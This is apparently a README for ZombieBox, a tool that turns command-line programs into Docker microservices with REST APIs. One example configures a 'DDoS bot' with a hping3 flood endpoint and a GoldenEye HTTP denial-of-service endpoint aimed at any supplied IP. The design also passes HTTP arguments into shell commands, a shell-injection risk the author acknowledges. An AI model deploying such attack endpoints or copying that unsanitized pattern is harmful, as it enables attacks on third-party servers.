![Alt text](https://i.imgur.com/muKHv4H.png)
# From the CLI to the Cloud #
ZombieBox is a system for automatically configuring remote control software containers. Basically ZombieBox microservice-izes code by turning things written to run on the command line into a Docker container with an exposed REST API.




## How do I get set up? ##
Start by cloning the project:
~~~~
git clone git@bitbucket.org:tracea/zombie-box.git
~~~~

Then install all python dependencies by running:
~~~~
make
~~~~

You will also need Docker and SailsJS installed as these are used to create the software containers and the APIs.

## How do I make a Zombiebox? ##
Run the following command:

~~~~
python zombieBox.py /path/to/mutation_file.json
~~~~

## What is a mutation file? ##
A mutation file describes the APIs and dependencies of a future Zombiebox. Here is an example of a simple mutation file that pulls a small python project from a git repository and turns it into a mircroservice:


~~~~
{"server_name": "zombie_p",
 "api_name": "math_stuff",
 "endpoints": [
     {"name": "multiply",
      "api": "python  multiply/mult_2.py {num1} {num2}",
      "dependencies": ["apt-get install -y python",
                       "apt-get install -y git",
                       "git clone https://tracea@bitbucket.org/tracea/multiply.git"]},
     {"name": "list",
      "api": "ls {OPTIONS}",
      "dependencies": []}
]}
~~~~

This mutation file defines the top level API to be math_staff with endpoints at multiply and list. Once this Zombiebox is up and running, the following call would multiply the two numbers supplied as arguments using code from the git repository and send back the result:

~~~~
/math_stuff/multiply?num1=3&num2=4
~~~~

This repository also defines an endpoint at /list which is helpful for testing:

~~~~
/math_stuff/list?OPTIONS=-al
~~~~
Perhaps a more interesting example is this mutation file the defines a Zombiebox that is DDoS Bot:
~~~~
{"server_name": "ddos_bot",
 "api_name": "DDoS",
 "endpoints": [
     {"name": "pingflood",
      "api": "hping3 -i ui -S -p {PORT} {IP}",
      "dependencies": ["apt-get install  -y hping3"]},
     {"name": "httpdos",
      "api": "python GoldenEye/goldeneye.py http://{IP}",
      "dependencies": ["apt-get install -y python",
                       "apt-get install -y git",
                       "git clone https://github.com/jseidl/GoldenEye"]}
 ]
}
~~~~

This Zombiebox defines two endpoints, one for each attack vector. The endpoint at /ddos/pingflood uses hping3 to perform a ping flood type of attack. In contrast, the endpoint at /ddos/httpdos uses a python project called GoldenEye to run a much slower denial of service attack designed to clog up a web server by keeping a large number of http connections open for as long as possible.

## Whats next for the project? ##
My vision for the ZombieBox project is to abstract the process of creating microservices and the process of writing code. ZombieBox could one day be used to create and deploy production ready microservices. By abstracting these processes, an architect could focus on configuring and coupling Zombieboxes while engineers focus on implementing code in their native environment. That being said, there is a lot of work to be done to get the ZombieBox project to that point. Here are the improvements that I think are most important for the project:

* The security of Zombieboxes needs to be improved:
    * Overall best securtiy practices need to be implemented for both Docker and SailsJS
    * Support for APIs requiring API Keys.
    * Because APIs define commands to be run on the command line, extensive checking of arguments sent over HTTP are needed to avoid shell injection.
    * Could running commands on the command line be avoided?

* Dependency definitions need improvement. I would like to simplify the process of defining dependencies for boxes. At the very least something with a lighter syntax.

* Support for Interaction between Zombieboxes:
    * It would be incredible to be able to define a large number of Zombieboxes and the interactions between them. That is what I see as the goal of this project.

## Who do I talk to? ##
I would love to hear your thoughts on the project! Email me at tandreason@gmail.com
